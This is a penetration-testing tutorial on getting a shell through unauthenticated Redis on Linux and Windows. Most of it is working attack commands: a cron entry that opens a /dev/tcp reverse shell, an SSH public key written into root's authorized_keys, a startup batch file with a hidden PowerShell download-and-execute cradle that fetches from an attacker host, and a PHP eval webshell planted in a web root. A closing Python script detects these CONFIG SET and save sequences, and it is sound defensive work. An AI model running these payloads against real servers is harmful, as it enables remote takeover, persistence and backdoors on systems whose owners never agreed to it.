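I. Environment Setup
Linux
Set up the environment directly with the vulhub lab. The address is: https://vulhub.org/#/docs/install-docker/
Windows
Package download address: https://github.com/microsoftarchive/redis/releases
Download the msi installer and install redis
II. Linux: Redis Unauthorized Access GetShell
Scheduled task GetShell
// Prerequisite: redis runs as the root user
set xxx "\n\n*/1 * * * * /bin/bash -i>&/dev/tcp/IP/port 0>&1\n\n" // Write the scheduled task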
config set dir /var/spool/cron
config set dbfilename root
save
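The attacking side listens on port 1234 and receives the reverse shell after about one minute
SSH public key GetShell
// On the attacking machine, generate a public key in the /root/.ssh directory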
ssh-keygen -t rsa
// Change the public key file's extension to txt, and write that txt into key 1 with set
(echo -e "\n";cat id_rsa.pub;echo -e "\n")>1.txt
cat 1.txt |redis-cli -h IP -a 123456 -x set 1
// Connect to redis
redis-cli -h IP -a 123456
get 1
config set dir /root/.ssh/
config set dbfilename authorized_keys
save
// Connect remotely
ssh root@IP
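III. Windows: Redis Unauthorized Access GetShell
Startup item GetShell (of limited use)
1. Use redis-cli -h IP to connect to the Redis server and enter info to check whether the connection succeeded
2. Use CS to generate the payload that brings the host online (other remote-control software such as MSF can also be used here)
Generate the PowerShell command
powershell.exe -nop -w hidden -c "IEX ((new-object net.webclient).downloadstring('http://192.168.254.134:80/a'))"
3. Set the Windows scheduled task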
192.168.254.130:6379> config set dir "C:/Users/Administrator/AppData/Roaming/Microsoft/Windows/Start Menu/Programs/startup/"
OK
192.168.254.130:6379> CONFIG SET dbfilename shell.bat
OK
192.168.254.130:6379> set x "\r\n\r\npowershell.exe -nop -w hidden -c \"IEX ((new-object net.webclient).downloadstring('http://192.168.254.134:80/a'))\"\n\r"
OK
192.168.254.130:6379> save
OK
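4. The victim host must reboot before this takes effect (of limited use)
Writing a shell through a web application
This way of writing a shell requires knowing the website path. Suppose the site's absolute path has already been obtained as D:\phpstudy_pro\WWW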
192.168.254.130:6379> CONFIG SET dir "D:/phpstudy_pro/WWW/test"
OK
192.168.254.130:6379> CONFIG sET dbfilename shell.php
OK
192.168.254.130:6379> set x "<?php @eval($_POST['admin'])?>"
OK
192.168.254.130:6379> save
OK
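A detection-side view of the four techniques above, as an added example that is not part of the original post: each one changes dir and dbfilename with CONFIG SET and then runs save, so the script below flags that sequence in Redis MONITOR output. The sample lines, client addresses and the SENSITIVE_DIRS list are constructed assumptions.

```python
import re
import shlex

# Path fragments the page's techniques aim "dir" at: cron spool, SSH keys, Windows startup.
SENSITIVE_DIRS = ("/var/spool/cron", "/.ssh", "/start menu/programs/startup")
# MONITOR line shape: <unix time> [<db> <client addr>] "arg" "arg" ...
LINE_RE = re.compile(r'^\d+\.\d+ \[\d+ (?P<client>\S+)\] (?P<cmd>.+)$')

def reasons_for(cfg):
    """Explain why the current dir/dbfilename pair looks like a file-write abuse."""
    reasons = []
    d = cfg.get("dir", "").replace("\\", "/").lower()
    if any(s in d for s in SENSITIVE_DIRS):
        reasons.append("dir points at a sensitive location")
    name = cfg.get("dbfilename")
    if name is not None and not name.lower().endswith(".rdb"):
        reasons.append("dbfilename is not an .rdb file")
    return reasons

def detect(monitor_lines):
    """Return (client, dir, dbfilename, reasons) for each SAVE/BGSAVE run after a
    suspicious CONFIG SET. The settings are server-wide, so state is global."""
    cfg, alerts = {}, []
    for line in monitor_lines:
        m = LINE_RE.match(line.strip())
        if not m:
            continue
        try:
            args = shlex.split(m["cmd"])
        except ValueError:      # unbalanced quoting: skip rather than crash
            continue
        verb = args[0].lower()
        if verb == "config" and len(args) >= 4 and args[1].lower() == "set":
            # Redis 7 accepts several name/value pairs in one CONFIG SET
            for key, value in zip(args[2::2], args[3::2]):
                if key.lower() in ("dir", "dbfilename"):
                    cfg[key.lower()] = value
        elif verb in ("save", "bgsave") and reasons_for(cfg):
            alerts.append((m["client"], cfg.get("dir"), cfg.get("dbfilename"), reasons_for(cfg)))
    return alerts

SAMPLE = [  # constructed MONITOR output, not captured traffic
    '1700000000.000002 [0 10.0.0.9:40222] "bgsave"',
    '1700000000.000003 [0 10.0.0.5:50111] "config" "set" "dir" "/var/spool/cron"',
    '1700000000.000004 [0 10.0.0.5:50111] "config" "set" "dbfilename" "root"',
    '1700000000.000005 [0 10.0.0.5:50111] "save"',
    '1700000000.000006 [0 10.0.0.7:50333] "CONFIG" "SET" "dir" "D:/phpstudy_pro/WWW/test" "dbfilename" "shell.php"',
    '1700000000.000007 [0 10.0.0.7:50333] "save"',
]
```

Because Redis can also write the dump on its own save schedule, the CONFIG SET on dir or dbfilename is itself worth alerting on, and renaming or disabling CONFIG in redis.conf together with requirepass and a restricted bind address removes the primitive entirely.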